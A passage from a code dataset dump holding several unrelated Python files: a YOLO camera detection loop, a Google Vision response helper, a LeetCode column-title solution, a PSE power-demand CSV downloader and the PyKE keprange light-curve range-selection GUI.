plot_one_box(xyxy, imgs, label=label, color=colors[int(cls)], line_thickness=3)\n \n # cv2.imshow(\"show\", imgs)\n # if cv2.waitKey(1) == ord('q'): # q to quit\n # raise StopIteration \n # T = 0\n\n while(isstop):\n # 從攝影機擷取一張影像\n fps = cap.get(cv2.CAP_PROP_FPS)\n ret, frame = cap.read()\n ret_r, frame_r = cap_r.read()\n results = model.detect_yolo(frame)\n s = ''\n t2 =time.time()\n t_value = (t2 - t1)/10\n T = int(t_value % 7)\n if len(results):\n # print('sss1',results)\n # print('len',len(results))\n # print('results[-1]',results[:, -1])\n # print('results[-1]',results[:, -1].unique())\n for c in results[:, -1].unique():\n n = (results[:, -1] == c).sum() # detections per class\n s += f'{n} {names[int(c)]}s, ' # add to string\n for *xyxy, conf, cls in reversed(results): \n # line = (cls, *xyxy, conf) \n # print(\"line\",line)\n # print(\"xyxy:\",xyxy)\n center_ai = center(xyxy)\n label = f'{names[int(cls)]} {conf:.2f}'\n plot_one_box_fir(xyxy, frame, frame_r, M, T,label=label, color=colors[int(cls)], line_thickness=3)\n cv2.putText(frame, s, (0,20), cv2.FONT_HERSHEY_SIMPLEX , 1, (255, 0, 0), 2)\n cv2.imshow(\"show\", frame)\n if cv2.waitKey(1) == ord('q'): \n isstop = False\n break \n \n # 釋放攝影機\n cap.release()\n cap_r.release()\n # 關閉所有 OpenCV 視窗\n cv2.destroyAllWindows()\n","sub_path":"main_detect_yolo_fir.py","file_name":"main_detect_yolo_fir.py","file_ext":"py","file_size_in_byte":7002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"592333164","text":"import cv2\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom io import BytesIO\r\n\r\nfrom google.protobuf.json_format import MessageToJson\r\n\r\nclass VisionApiResponse:\r\n \r\n def __init__(self, response, type, content):\r\n self.__response = response\r\n self.type = type\r\n self.content = content\r\n\r\n def json(self):\r\n return MessageToJson(self.__response._pb)\r\n \r\n \r\n def result_content(self):\r\n return getattr(self, f'result_content_{self.type}')()\r\n \r\n \r\n def result_content_object_localization(self):\r\n # 画像をOpenCVで読み込む\r\n img = cv2.imdecode(np.frombuffer(self.content, np.uint8), cv2.IMREAD_UNCHANGED)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # BGR→RGBに変換\r\n \r\n img2 = img.copy()\r\n h, w = img2.shape[0:2]\r\n color = (255, 0, 0)\r\n font = cv2.FONT_HERSHEY_DUPLEX\r\n \r\n for obj in self.__response.localized_object_annotations:\r\n # バウンディングボックスの左上と右下の角の座標を取得して書き足す\r\n box = [(v.x * w, v.y * h) for v in obj.bounding_poly.normalized_vertices]\r\n\r\n cv2.rectangle(img2, tuple(map(int, box[0])), tuple(map(int, box[2])), color, 2)\r\n # オブジェクトの名前を取得して書き足す\r\n obname = obj.name\r\n cv2.putText(img2, obname ,tuple(map(int, box[3])), font, \r\n 1, color)\r\n \r\n img2 = Image.fromarray(img2)\r\n image_io = BytesIO()\r\n img2.save(image_io, format=\"JPEG\")\r\n return image_io\r\n \r\n","sub_path":"libs/gcp/vision/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"107219709","text":"def utilSequenceSearch(list,size,searchValue):\n for k in range(0,size):\n if searchValue==list[k]:\n return k\n return -1\n\ndef makeData(size):\n import random\n list=[]\n\n while len(list) A\n# 2 -> B\n# 3 -> C\n# ...\n# 26 -> Z\n# 27 -> AA\n# 28 -> AB\n# ...\n# Example 1:\n#\n# Input: 1\n# Output: \"A\"\n# Example 2:\n#\n# Input: 28\n# Output: \"AB\"\n# Example 3:\n#\n# Input: 701\n# Output: \"ZY\"\n\n# 思路方法\n#\n# 首先,我们要知道Excel里这个对应关系是什么样的。从A-Z对应1-26,当列标题进一位变成AA时,列对应的数字变成27。\n# 所以这个题本质上是一个10进制转26进制的问题,不过A对应的是1而不是0,要注意。\n#\n# 思路一\n#\n# 用处理进制转换的一般思路,重复取模和除法即可。但是注意由于A对应1,所以Z之后是AA,这个转换不同于一般的进制转换。\n\nclass Solution:\n def convertToTitle(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n res=''\n while n:\n res=chr((n-1)%26+65)+res\n n=(n-1)//26\n return res\n","sub_path":"src/168_Excel_Sheet_Column_Title.py","file_name":"168_Excel_Sheet_Column_Title.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"160191034","text":"from datetime import datetime as dt\r\nimport pandas as pd\r\nfrom urllib import error as httperr\r\n\r\nzmiany_czasu = []\r\nlista_bledow = []\r\n\r\n'''\r\nBrakuje godzin przy zmianie czasu z zimowego na letni!!!\r\n'''\r\n\r\n\r\n# WPKD\r\n\r\ndef wpkd(data_od, data_do):\r\n nazwa_pliku = 'wpkd.xlsx'\r\n adres = 'https://www.pse.pl/getcsv/-/export/csv/WPKD/data/'\r\n tabela_wpkd = pd.DataFrame(columns=['Data', 'Godzina', 'WPKD'])\r\n okres = pd.date_range(data_od, data_do)\r\n for data in okres:\r\n plik = adres + data.strftime('%Y%m%d')\r\n try:\r\n wpkd_dzien = pd.read_csv(plik, encoding='ISO-8859-1', sep=';', usecols=[0, 1, 2], parse_dates=[0])\r\n except httperr.HTTPError as error:\r\n print('---------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(WPKD) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n wpkd_dzien.rename(index=str, columns={'Krajowe zapotrzebowanie na moc': 'WPKD'}, inplace=True)\r\n try:\r\n wpkd_dzien['Godzina'] = wpkd_dzien['Godzina'].astype(int)\r\n except ValueError:\r\n wpkd_dzien['Godzina'] = pd.to_numeric(wpkd_dzien['Godzina'], errors='coerce')\r\n wpkd_dzien.dropna(axis=0, how='any', inplace=True)\r\n wpkd_dzien['Godzina'] = wpkd_dzien['Godzina'].astype(int)\r\n print('---------')\r\n print('Zmiana czasu - usunięto godzinę 2A')\r\n zmiany_czasu.append('(WPKD) Zmiana czasu - usunięto godzinę 2A dla daty: ' + data.strftime('%Y-%m-%d'))\r\n try:\r\n tabela_wpkd = pd.merge(tabela_wpkd, wpkd_dzien, how='outer')\r\n print('(WPKD) ' + data.strftime('%Y-%m-%d'))\r\n except BaseException as error:\r\n print('-----------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(WPKD) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n tabela_wpkd.to_excel(nazwa_pliku)\r\n return tabela_wpkd\r\n\r\n\r\n# PKD\r\n\r\ndef pkd(data_od, data_do):\r\n nazwa_pliku = 'pkd.xlsx'\r\n adres = 'https://www.pse.pl/getcsv/-/export/csv/PKD/data/'\r\n tabela_pkd = pd.DataFrame(columns=['Data', 'Godzina', 'PKD'])\r\n okres = pd.date_range(data_od, data_do)\r\n for data in okres:\r\n plik = adres + data.strftime('%Y%m%d')\r\n try:\r\n pkd_dzien = pd.read_csv(plik, encoding='ISO-8859-1', sep=';', usecols=[0, 1, 2], parse_dates=[0])\r\n except httperr.HTTPError as error:\r\n print('---------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(PKD) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n pkd_dzien.rename(index=str, columns={'Krajowe zapotrzebowanie na moc': 'PKD'}, inplace=True)\r\n try:\r\n pkd_dzien['Godzina'] = pkd_dzien['Godzina'].astype(int)\r\n except ValueError:\r\n pkd_dzien['Godzina'] = pd.to_numeric(pkd_dzien['Godzina'], errors='coerce')\r\n pkd_dzien.dropna(axis=0, how='any', inplace=True)\r\n pkd_dzien['Godzina'] = pkd_dzien['Godzina'].astype(int)\r\n print('---------')\r\n print('Zmiana czasu - usunięto godzinę 2A')\r\n zmiany_czasu.append('(PKD) Zmiana czasu - usunięto godzinę 2A dla daty: ' + data.strftime('%Y-%m-%d'))\r\n try:\r\n tabela_pkd = pd.merge(tabela_pkd, pkd_dzien, how='outer')\r\n print('(PKD) ' + data.strftime('%Y-%m-%d'))\r\n except BaseException as error:\r\n print('-----------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(PKD) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n tabela_pkd.to_excel(nazwa_pliku)\r\n return tabela_pkd\r\n\r\n\r\n# BPKD\r\n\r\ndef bpkd(data_od, data_do):\r\n nazwa_pliku = 'bpkd.xlsx'\r\n adres = 'https://www.pse.pl/getcsv/-/export/csv/BPKD/data/'\r\n tabela_bpkd = pd.DataFrame(columns=['Data', 'Godzina', 'BPKD'])\r\n okres = pd.date_range(data_od, data_do)\r\n for data in okres:\r\n plik = adres + data.strftime('%Y%m%d')\r\n try:\r\n bpkd_dzien = pd.read_csv(plik, encoding='ISO-8859-1', sep=';', usecols=[0, 1, 2], parse_dates=[0])\r\n except httperr.HTTPError as error:\r\n print('---------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(BPKD) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n bpkd_dzien.rename(index=str, columns={'Krajowe zapotrzebowanie na moc': 'BPKD'}, inplace=True)\r\n try:\r\n bpkd_dzien['Godzina'] = bpkd_dzien['Godzina'].astype(int)\r\n except ValueError:\r\n bpkd_dzien['Godzina'] = pd.to_numeric(bpkd_dzien['Godzina'], errors='coerce')\r\n bpkd_dzien.dropna(axis=0, how='any', inplace=True)\r\n bpkd_dzien['Godzina'] = bpkd_dzien['Godzina'].astype(int)\r\n print('---------')\r\n print('Zmiana czasu - usunięto godzinę 2A')\r\n zmiany_czasu.append('(BPKD) Zmiana czasu - usunięto godzinę 2A dla daty: ' + data.strftime('%Y-%m-%d'))\r\n try:\r\n tabela_bpkd = pd.merge(tabela_bpkd, bpkd_dzien, how='outer')\r\n print('(BPKD) ' + data.strftime('%Y-%m-%d'))\r\n except BaseException as error:\r\n print('-----------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(BPKD) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n tabela_bpkd.to_excel(nazwa_pliku)\r\n return tabela_bpkd\r\n\r\n\r\n# WYK KSE\r\n\r\ndef wyk(data_od, data_do):\r\n nazwa_pliku = 'wyk.xlsx'\r\n adres = 'https://www.pse.pl/getcsv/-/export/csv/WYK_KSE/data/'\r\n tabela_wyk = pd.DataFrame(columns=['Data', 'Godzina', 'Wykonanie KSE'])\r\n okres = pd.date_range(data_od, data_do)\r\n for data in okres:\r\n plik = adres + data.strftime('%Y%m%d')\r\n try:\r\n wyk_dzien = pd.read_csv(plik, encoding='ISO-8859-1', sep=';', usecols=[0, 1, 2], parse_dates=[0], decimal=',')\r\n except httperr.HTTPError as error:\r\n print('---------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(WYK) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n wyk_dzien.rename(index=str, columns={'Krajowe zapotrzebowanie na moc': 'Wykonanie KSE'}, inplace=True)\r\n try:\r\n wyk_dzien['Godzina'] = wyk_dzien['Godzina'].astype(int)\r\n except ValueError:\r\n wyk_dzien['Godzina'] = pd.to_numeric(wyk_dzien['Godzina'], errors='coerce')\r\n wyk_dzien.dropna(axis=0, how='any', inplace=True)\r\n wyk_dzien['Godzina'] = wyk_dzien['Godzina'].astype(int)\r\n print('---------')\r\n print('Zmiana czasu - usunięto godzinę 2A')\r\n zmiany_czasu.append('(WYK) Zmiana czasu - usunięto godzinę 2A dla daty: ' + data.strftime('%Y-%m-%d'))\r\n try:\r\n tabela_wyk = pd.merge(tabela_wyk, wyk_dzien, how='outer')\r\n print('(WYK) ' + data.strftime('%Y-%m-%d'))\r\n except BaseException as error:\r\n print('-----------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(WYK) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n tabela_wyk.to_excel(nazwa_pliku)\r\n return tabela_wyk\r\n\r\n\r\n# Złącz do sumarycznego arkusza\r\n\r\ndef polacz_arkusze():\r\n sciezka_plikow = ''\r\n zapotrzebowanie = pd.DataFrame(columns=['Data', 'Godzina'])\r\n try:\r\n wpkd_dane = pd.read_excel(sciezka_plikow + 'wpkd.xlsx')\r\n zapotrzebowanie = pd.merge(zapotrzebowanie, wpkd_dane, how='outer')\r\n except FileNotFoundError:\r\n print('Pominięto WPKD - brak pliku!')\r\n try:\r\n pkd_dane = pd.read_excel(sciezka_plikow + 'pkd.xlsx')\r\n zapotrzebowanie = pd.merge(zapotrzebowanie, pkd_dane, how='outer')\r\n except FileNotFoundError:\r\n print('Pominięto PKD - brak pliku!')\r\n try:\r\n bpkd_dane = pd.read_excel(sciezka_plikow + 'bpkd.xlsx')\r\n zapotrzebowanie = pd.merge(zapotrzebowanie, bpkd_dane, how='outer')\r\n except FileNotFoundError:\r\n print('Pominięto BPKD - brak pliku!')\r\n try:\r\n wyk_dane = pd.read_excel(sciezka_plikow + 'wyk.xlsx')\r\n zapotrzebowanie = pd.merge(zapotrzebowanie, wyk_dane, how='outer')\r\n except FileNotFoundError:\r\n print('Pominięto WYK - brak pliku!')\r\n zapotrzebowanie.sort_values(by=['Data', 'Godzina'], ascending=True, inplace=True)\r\n zapotrzebowanie.to_excel('Zapotrzebowanie_Plan_Wykonanie.xlsx')\r\n return zapotrzebowanie\r\n\r\n\r\n# Wykonanie kodu\r\n\r\n# wpkd = wpkd(dt(2009, 1, 1), dt(2018, 12, 31))\r\n# pkd = pkd(dt(2009, 1, 1), dt(2018, 12, 31))\r\n# bpkd = bpkd(dt(2012, 1, 1), dt(2018, 12, 31))\r\n# wyk = wyk(dt(2009, 1, 1), dt(2018, 12, 31))\r\n\r\n\r\npolacz_arkusze()\r\n\r\nprint('Zmiany czasu: ')\r\nfor i in zmiany_czasu:\r\n print(i)\r\n\r\nprint('-------------')\r\nprint('Lista błędów: ')\r\nfor i in lista_bledow:\r\n print(i)\r\n\r\n","sub_path":"Zapotrzebowanie_KSE.py","file_name":"Zapotrzebowanie_KSE.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"177398441","text":"from .utils import PyKEArgumentHelpFormatter\r\nfrom . import kepio, kepmsg, kepkey\r\nimport numpy as np\r\nfrom astropy.io import fits as pyfits\r\nfrom matplotlib import pyplot as plt\r\n\r\n# global variables\r\n\r\ninstr = ''; cadence = 1800.0; barytime0 = 0\r\nnrm = 1; barytime = []; flux = []; xmin = 0; xmax = 1\r\nymin = 0; ymax = 1; xr = 1; yr = 1; xlab = ''; ylab = ''\r\nmask = []; aid = None; bid = None; cid = None; did = None; eid = None; fid = None\r\nclobb = True; outf = ''; verb = True; logf = ''; rinf = ''\r\n\r\n\r\n__all__ = ['keprange']\r\n\r\n\r\ndef keprange(infile, outfile=None, datacol='SAP_FLUX', rinfile='',\r\n overwrite=False, verbose=False, logfile='keprange.log'):\r\n \"\"\"\r\n keprange -- Define time ranges interactively for use with other PyKE tasks.\r\n\r\n A number of PyKE tasks, e.g. kepdetrend, kepoutlier, require the user to\r\n specify ranges in time over which to operate. keprange provides a visual\r\n and interactive tool with which to define time ranges and store them within\r\n an ASCII file. Choices are made using a GUI. Use the left-button of your\r\n mouse to select ranges. An existing ASCII file can be loaded, a new ASCII\r\n file can be written, the list of times can be cleared or printed using the\r\n buttons on the GUI.\r\n\r\n Parameters\r\n ----------\r\n infile : str\r\n The name of a MAST standard format FITS file containing a Kepler light\r\n curve within the first data extension.\r\n outfile : str\r\n The name of the output ASCII file storing time ranges for future use in\r\n other PyKE tools.\r\n rinfile : str\r\n An existing ASCII file containing time ranges in Barycentric Julian\r\n Date (BJD) can be uploaded into the task. This can be used as a basis\r\n for a new set of time ranges. This argument is optional and is not\r\n prompted for automatically. If no ascii file will be input then\r\n rinfile=None will clear the argument buffer after a previous use.\r\n datacol : str\r\n The datacol name containing data stored within extension 1 of infile.\r\n This data will be plotted against time so that the user can choose\r\n appropriate time ranges.\r\n overwrite : bool\r\n Overwrite the output file?\r\n verbose : bool\r\n Print informative messages and warnings to the shell and logfile?\r\n logfile : str\r\n Name of the logfile containing error and warning messages.\r\n\r\n Examples\r\n --------\r\n .. code-block:: bash\r\n\r\n $ keprange kplr002436324-2009259160929_llc.fits --verbose\r\n\r\n .. image:: ../_static/images/api/keprange.png\r\n :align: center\r\n \"\"\"\r\n\r\n if outfile is None:\r\n outfile = infile.split('.')[0] + \"-{}.txt\".format(__all__[0])\r\n\r\n # startup parameters\r\n global instr, cadence, barytime0, nrm, barytime, flux\r\n global xmin, xmax, ymin, ymax, xr, yr, xlab, ylab\r\n global clobb, outf, verb, logf, rinf, col, bjdref, cade\r\n\r\n # log the call\r\n hashline = '--------------------------------------------------------------'\r\n kepmsg.log(logfile, hashline, verbose)\r\n call = ('KEPRANGE -- '\r\n + ' infile={}'.format(infile)\r\n + ' outfile={}'.format(outfile)\r\n + ' rinfile={}'.format(rinfile)\r\n + ' datacol={}'.format(datacol)\r\n + ' overwrite={}'.format(overwrite)\r\n + ' verbose={}'.format(verbose)\r\n + ' logfile={}'.format(logfile))\r\n kepmsg.log(logfile, call+'\\n', verbose)\r\n clobb = overwrite\r\n outf = outfile\r\n verb = verbose\r\n logf = logfile\r\n rinf = rinfile\r\n\r\n # start time\r\n kepmsg.clock('KEPRANGE started at: ', logfile, verbose)\r\n\r\n # overwrite output file\r\n if overwrite:\r\n kepio.overwrite(outfile, logfile, verbose)\r\n if kepio.fileexists(outfile):\r\n errmsg = 'ERROR -- KEPRANGE: {} exists. Use --overwrite'.format(outfile)\r\n kepmsg.err(logfile, errmsg, verbose)\r\n\r\n ## open input file\r\n instr = pyfits.open(infile, 'readonly')\r\n tstart, tstop, bjdref, cadence = kepio.timekeys(instr, infile,\r\n logfile, verbose)\r\n try:\r\n work = instr[0].header['FILEVER']\r\n cadenom = 1.0\r\n except:\r\n cadenom = cadence\r\n cade = cadenom\r\n\r\n # fudge non-compliant FITS keywords with no values\r\n instr = kepkey.emptykeys(instr, infile, logfile, verbose)\r\n # input data\r\n table = instr[1].data\r\n\r\n # filter out NaNs\r\n work1 = []; work2 = []\r\n col = datacol\r\n barytime = kepio.readtimecol(infile, table, logfile, verbose)\r\n try:\r\n flux = instr[1].data.field(col)\r\n except:\r\n errmsg = ('ERROR -- KEPRANGE: no datacol named {} in table {} [1]'\r\n .format(col, infile))\r\n kepmsg.err(infile, message, verbose)\r\n for i in range(len(barytime)):\r\n if (np.isfinite(barytime[i]) and np.isfinite(flux[i])\r\n and flux[i] != 0.0):\r\n work1.append(barytime[i] + bjdref)\r\n work2.append(flux[i])\r\n barytime = np.array(work1, dtype=np.float64)\r\n flux = np.array(work2, dtype=np.float32) / cadenom\r\n\r\n # clean up x-axis unit\r\n barytime0 = float(int(tstart / 100) * 100.0)\r\n barytime = barytime - barytime0\r\n xlab = 'BJD $-$ {}'.format(barytime0)\r\n\r\n # clean up y-axis units\r\n nrm = len(str(int(flux.max()))) - 1\r\n flux = flux / 10 ** nrm\r\n ylab = '10$^%d$ e$^-$ s$^{-1}$' % nrm\r\n\r\n # data limits\r\n xmin = barytime.min()\r\n xmax = barytime.max()\r\n ymin = flux.min()\r\n ymax = flux.max()\r\n xr = xmax - xmin\r\n yr = ymax - ymin\r\n flux[0] = 0.0\r\n flux[-1] = 0.0\r\n\r\n # plot new light curve\r\n plt.rcParams['figure.dpi'] = 80\r\n plt.figure(figsize=[17, 7])\r\n plotlc()\r\n\r\n\r\ndef plotlc():\r\n global aid, bid, cid, did, eid, fid, mask\r\n\r\n # load button\r\n plt.clf()\r\n plt.axes([0.06, 0.02, 0.22, 0.1])\r\n plt.text(0.5, 0.5, 'LOAD', fontsize=24, weight='heavy',\r\n horizontalalignment='center', verticalalignment='center')\r\n plt.setp(plt.gca(), xticklabels=[], xticks=[], yticklabels=[], yticks=[])\r\n plt.fill([0.0, 1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0, 0.0], '#ffffee')\r\n plt.xlim(0.0, 1.0)\r\n plt.ylim(0.0, 1.0)\r\n aid = plt.connect('button_press_event', clicker1)\r\n\r\n # save button\r\n plt.axes([0.2933, 0.02, 0.22, 0.1])\r\n plt.text(0.5, 0.5, 'SAVE', fontsize=24, weight='heavy',\r\n horizontalalignment='center', verticalalignment='center')\r\n plt.setp(plt.gca(), xticklabels=[], xticks=[], yticklabels=[], yticks=[])\r\n plt.fill([0.0, 1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0, 0.0], '#ffffee')\r\n plt.xlim(0.0, 1.0)\r\n plt.ylim(0.0, 1.0)\r\n bid = plt.connect('button_press_event', clicker2)\r\n\r\n # clear button\r\n plt.axes([0.5266, 0.02, 0.22, 0.1])\r\n plt.text(0.5, 0.5, 'CLEAR', fontsize=24, weight='heavy',\r\n horizontalalignment='center', verticalalignment='center')\r\n plt.setp(plt.gca(), xticklabels=[], xticks=[], yticklabels=[], yticks=[])\r\n plt.fill([0.0, 1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0, 0.0], '#ffffee')\r\n plt.xlim(0.0, 1.0)\r\n plt.ylim(0.0, 1.0)\r\n cid = plt.connect('button_press_event', clicker3)\r\n\r\n # print button\r\n plt.axes([0.76, 0.02, 0.22, 0.1])\r\n plt.text(0.5, 0.5, 'PRINT', fontsize=24, weight='heavy',\r\n horizontalalignment='center', verticalalignment='center')\r\n plt.setp(plt.gca(), xticklabels=[], xticks=[], yticklabels=[], yticks=[])\r\n plt.fill([0.0, 1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0, 0.0], '#ffffee')\r\n plt.xlim(0.0, 1.0)\r\n plt.ylim(0.0, 1.0)\r\n did = plt.connect('button_press_event', clicker4)\r\n\r\n # light curve\r\n plt.axes([0.06, 0.213, 0.92, 0.77])\r\n plt.gca().xaxis.set_major_formatter(plt.ScalarFormatter(useOffset=False))\r\n plt.gca().yaxis.set_major_formatter(plt.ScalarFormatter(useOffset=False))\r\n ltime = []; ldata = []\r\n work1 = instr[1].data.field(0) + bjdref\r\n work2 = instr[1].data.field(col) / cade\r\n for i in range(len(work1)):\r\n if np.isfinite(work1[i]) or np.isfinite(work2[i]):\r\n ltime.append(work1[i])\r\n ldata.append(work2[i])\r\n else:\r\n ltime = np.array(ltime, dtype=np.float64) - barytime0\r\n ldata = np.array(ldata, dtype=np.float64) / 10 ** nrm\r\n plt.plot(ltime,ldata,color='#0000ff',linestyle='-',linewidth=1.0)\r\n ltime = []; ldata = []\r\n ltime = np.array(ltime, dtype=np.float64) - barytime0\r\n ldata = np.array(ldata, dtype=np.float64) / 10 ** nrm\r\n plt.plot(ltime, ldata, color='#0000ff', linestyle='-', linewidth=1.0)\r\n plt.fill(barytime, flux, fc='#ffff00', linewidth=0.0, alpha=0.2)\r\n plt.xlabel(xlab, {'color' : 'k'})\r\n plt.ylabel(ylab, {'color' : 'k'})\r\n plt.grid()\r\n\r\n # plt.plot masks\r\n for i in range(len(mask)):\r\n t = float(mask[i])\r\n plt.plot([t, t], [ymin, ymax], color='g', linestyle='-', linewidth=0.5)\r\n nt = 0\r\n for i in range(int(len(mask) / 2)):\r\n t1 = float(mask[nt])\r\n t2 = float(mask[nt + 1])\r\n nt += 2\r\n plt.fill([t1, t1, t2, t2, t1], [ymin, ymax, ymax, ymin, ymin],\r\n fc='g', linewidth=0.0, alpha=0.5)\r\n # plot ranges\r\n plt.xlim(xmin - xr * 0.01, xmax + xr * 0.01)\r\n if ymin - yr * 0.01 <= 0.0:\r\n plt.ylim(1.0e-10, ymax + yr * 0.01)\r\n else:\r\n plt.ylim(ymin - yr * 0.01, ymax + yr * 0.01)\r\n\r\n # ranges\r\n eid = plt.connect('button_press_event', clicker6)\r\n\r\n # render plot\r\n plt.show()\r\n\r\ndef clicker1(event):\r\n\r\n global mask, aid, bid, cid, did, eid, fid\r\n\r\n if event.inaxes:\r\n if event.button == 1:\r\n if (event.x > 83 and event.x < 383 and\r\n event.y > 12 and event.y < 68):\r\n if kepio.fileexists(rinf):\r\n mask = []\r\n lines = kepio.openascii(rinf, 'r', logf, verb)\r\n for line in lines:\r\n line = line.strip().split(',')\r\n try:\r\n float(line[0])\r\n float(line[1])\r\n if barytime0 > 2.4e6:\r\n mask.append(float(line[0]) - barytime0)\r\n mask.append(float(line[1]) - barytime0)\r\n else:\r\n mask.append(float(line[0]) - barytime0 - 2.4e6)\r\n mask.append(float(line[1]) - barytime0 - 2.4e6)\r\n except:\r\n message = 'ERROR -- KEPRANGE: ascii format of ranges '\r\n message += 'file not recognized.'\r\n kepmsg.err(logf, message, False)\r\n plt.disconnect(aid)\r\n plt.disconnect(bid)\r\n plt.disconnect(cid)\r\n plt.disconnect(did)\r\n plt.disconnect(eid)\r\n plt.disconnect(fid)\r\n plotlc()\r\n else:\r\n print('WARNING -- KEPRANGE: input ranges file does not'\r\n ' exist or was not provided')\r\n return\r\n\r\n# -----------------------------------------------------------\r\n# save mask to ascii file\r\n\r\ndef clicker2(event):\r\n\r\n global mask, aid, bid, cid, did, eid, fid, clobb\r\n\r\n if clobb:\r\n kepio.overwrite(outf, logf, verb)\r\n if kepio.fileexists(outf):\r\n message = 'ERROR -- KEPRANGE: {} exists. Use --overwrite'.format(outf)\r\n kepmsg.err(logf, message, verb)\r\n else:\r\n if event.inaxes:\r\n if event.button == 1:\r\n if (event.x > 402 and event.x < 702 and\r\n event.y > 12 and event.y < 68):\r\n nt = 0; txt = ''\r\n for i in range(int(len(mask)/2)):\r\n t1 = float(mask[nt]) + barytime0\r\n t2 = float(mask[nt+1]) + barytime0\r\n if t1 < 2.4e6: t1 += 2.4e6\r\n if t2 < 2.4e6: t2 += 2.4e6\r\n txt += str(t1) + ',' + str(t2) + '\\n'\r\n nt += 2\r\n txt = txt.strip()\r\n kepmsg.log(outf, txt, True)\r\n print('\\nWrote ASCII file ' + outf)\r\n plotlc()\r\n\r\n# -----------------------------------------------------------\r\n# clear time domain mask\r\n\r\ndef clicker3(event):\r\n\r\n global mask, aid, bid, cid, did, eid, fid\r\n\r\n if event.inaxes:\r\n if event.button == 1:\r\n if (event.x > 723 and event.x < 1022 and\r\n event.y > 12 and event.y < 68):\r\n mask = []\r\n plt.disconnect(aid)\r\n plt.disconnect(bid)\r\n plt.disconnect(cid)\r\n plt.disconnect(did)\r\n plt.disconnect(eid)\r\n plt.disconnect(fid)\r\n plotlc()\r\n\r\n# -----------------------------------------------------------\r\n# print time domain mask\r\n\r\ndef clicker4(event):\r\n\r\n global mask, aid, bid, cid, did, eid, fid\r\n\r\n if event.inaxes:\r\n if event.button == 1:\r\n if (event.x > 1042 and event.x < 1342 and\r\n event.y > 12 and event.y < 68):\r\n nt = 0; txt = ''\r\n for i in range(int(len(mask)/2)):\r\n t1 = float(mask[nt]) + barytime0\r\n t2 = float(mask[nt+1]) + barytime0\r\n if t1 < 2.4e6: t1 += 2.4e6\r\n if t2 < 2.4e6: t2 += 2.4e6\r\n txt += str(t1) + ',' + str(t2) + '\\n'\r\n nt += 2\r\n txt = txt.strip()\r\n print('\\n' + txt)\r\n plt.disconnect(aid)\r\n plt.disconnect(bid)\r\n plt.disconnect(cid)\r\n plt.disconnect(did)\r\n plt.disconnect(eid)\r\n plt.disconnect(fid)\r\n plotlc()\r\n\r\n# -----------------------------------------------------------\r\n# left-click create time ranges\r\n\r\ndef clicker6(event):\r\n\r\n global mask, aid, bid, cid, did, eid, fid\r\n\r\n if event.inaxes:\r\n if event.button == 1:\r\n if (event.x > 83 and event.x < 1337 and\r\n event.y > 122 and event.y < 558):\r\n if len(mask) % 2 == 0:\r\n mask.append(event.xdata)\r\n else:\r\n if event.xdata > mask[-1]:\r\n mask.append(event.xdata)\r\n else:\r\n mask.append(mask[-1])\r\n mask[-2] = event.xdata\r\n plotlc()\r\n\r\ndef keprange_main():\r\n import argparse\r\n parser = argparse.ArgumentParser(\r\n description=('Interactively define and store time ranges via a'\r\n ' GUI'),\r\n formatter_class=PyKEArgumentHelpFormatter)\r\n parser.add_argument('infile', help='Name of input file', type=str)\r\n parser.add_argument('--outfile',\r\n help=('Name of ASCII file to output time ranges.'\r\n ' If None, outfile is infile-keprange.'),\r\n default=None)\r\n parser.add_argument('--datacol', default='SAP_FLUX',\r\n help='Name of diagnostic FITS column', type=str)\r\n parser.add_argument('--rinfile', default='',\r\n help='Name of input ASCII time ranges file')\r\n parser.add_argument('--overwrite', action='store_true',\r\n help='Overwrite output file?')\r\n parser.add_argument('--verbose', action='store_true',\r\n help='Write to a log file?')\r\n parser.add_argument('--logfile', '-l', help='Name of ascii log file',\r\n default='keprange.log', dest='logfile', type=str)\r\n args = parser.parse_args()\r\n keprange(args.infile, args.outfile, args.datacol, args.rinfile,\r\n args.overwrite, args.verbose, 